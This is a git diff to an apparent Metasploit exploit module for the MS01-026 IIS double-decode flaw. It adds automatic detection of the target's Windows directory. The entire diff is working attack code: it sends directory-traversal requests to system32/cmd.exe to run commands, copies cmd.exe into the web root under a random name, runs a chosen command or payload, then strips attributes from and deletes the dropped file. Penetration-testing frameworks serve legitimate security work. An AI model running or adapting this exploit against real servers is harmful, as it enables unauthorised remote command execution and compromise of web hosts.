diff --git a/modules/exploits/windows/iis/ms01_026_dbldecode.rb b/modules/exploits/windows/iis/ms01_026_dbldecode.rb index f05ed5eefd..d78ded0ec5 100644 --- a/modules/exploits/windows/iis/ms01_026_dbldecode.rb +++ b/modules/exploits/windows/iis/ms01_026_dbldecode.rb @@ -53,6 +53,7 @@ class Metasploit3 < Msf::Exploit::Remote [ Opt::RPORT(80), OptBool.new('VERBOSE', [ false, 'Enable verbose output', false ]), + OptString.new('WINDIR', [ false, 'The windows directory of the target host', nil ]), OptString.new('CMD', [ false, 'Execute this command instead of using command stager', nil ]) ], self.class) @@ -105,14 +106,27 @@ class Metasploit3 < Msf::Exploit::Remote [headers, body] end + + def detect_windows_dir() + win_dirs = [ 'winnt', 'windows' ] + win_dirs.each { |dir| + + res = execute_command("dir", { :windir => dir }) + if (res.kind_of?(Array)) + body = res[1] + if (body and body =~ /Directory of /) + return dir + end + end + } + return nil + end + def check - res = execute_command("dir") - if (res.kind_of?(Array)) - body = res[1] - if (body and body =~ /Directory of /) - return Exploit::CheckCode::Vulnerable - end + @win_dir = detect_windows_dir() + if @win_dir + return Exploit::CheckCode::Vulnerable end Exploit::CheckCode::Safe @@ -129,14 +143,15 @@ class Metasploit3 < Msf::Exploit::Remote # Using the "start" method doesn't seem to make iis very happy :( return [nil,nil] if cmd =~ /^start [a-zA-Z]+\.exe$/ - print_status("Executing command: #{cmd}") + print_status("Executing command: #{cmd} (options: #{opts.inspect})") uri = '/scripts/' exe = opts[:cgifname] if (not exe) uri << dotdotslash uri << dotdotslash - uri << 'winnt/system32/cmd.exe' + uri << (opts[:windir] || @win_dir) + uri << '/system32/cmd.exe' else uri << exe end @@ -156,12 +171,22 @@ class Metasploit3 < Msf::Exploit::Remote def exploit - # first copy the file + @win_dir = datastore['WINDIR'] + if not @win_dir + # try to detect the windows directory + @win_dir = detect_windows_dir() + if not @win_dir + raise RuntimeError, "Unable to detect the target host windows directory (maybe not vulnerable)!" + end + end + print_status("Using windows directory \"#{@win_dir}\"") + + # now copy the file exe_fname = rand_text_alphanumeric(4+rand(4)) + ".exe" print_status("Copying cmd.exe to the web root as \"#{exe_fname}\"...") # NOTE: this assumes %SystemRoot% on the same drive as the web scripts directory - # However, it using %SystemRoot% doesn't seem to work :( - res = execute_command("copy \\winnt\\system32\\cmd.exe #{exe_fname}") + # Unfortunately, using %SystemRoot% doesn't seem to work :( + res = execute_command("copy \\#{@win_dir}\\system32\\cmd.exe #{exe_fname}") if (datastore['CMD']) res = execute_command(datastore['CMD'], { :cgifname => exe_fname }) @@ -220,7 +245,7 @@ class Metasploit3 < Msf::Exploit::Remote delete_me_too = "C:\\inetpub\\scripts\\" + @exe_payload print_status("Changing permissions on #{delete_me_too} ...") - cmd = "C:\\winnt\\system32\\attrib.exe -r -h -s " + delete_me_too + cmd = "C:\\#{@win_dir}\\system32\\attrib.exe -r -h -s " + delete_me_too client.sys.process.execute(cmd, nil, {'Hidden' => true }) print_status("Deleting #{delete_me_too} ...")